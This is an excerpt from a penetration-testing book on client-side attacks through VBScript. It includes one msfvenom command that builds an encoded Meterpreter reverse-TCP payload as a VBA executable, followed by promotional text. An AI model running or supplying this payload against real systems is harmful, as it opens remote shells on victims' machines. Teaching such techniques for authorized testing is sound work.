Conducting attacks using VBScript

Visual Basic Scripting (VBScript) is an active scripting language developed by Microsoft. It was designed to be a lightweight, Windows-native language that could execute small programs. VBScript has been installed by default on every desktop release of Microsoft Windows since Windows 98, making it an excellent target for client-side attacks.

To launch an attack using VBScript, we'll use msfvenom from the command line:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f vba-exe  

Note that f designates that the output will be a file that is VBA executable. The output will appear as a text file with two specific parts, as shown in the ...

Get Mastering Kali Linux for Advanced Penetration Testing - Second Edition now with the O’Reilly learning platform.

O’Reilly members experience live online training, plus books, videos, and digital content from nearly 200 publishers.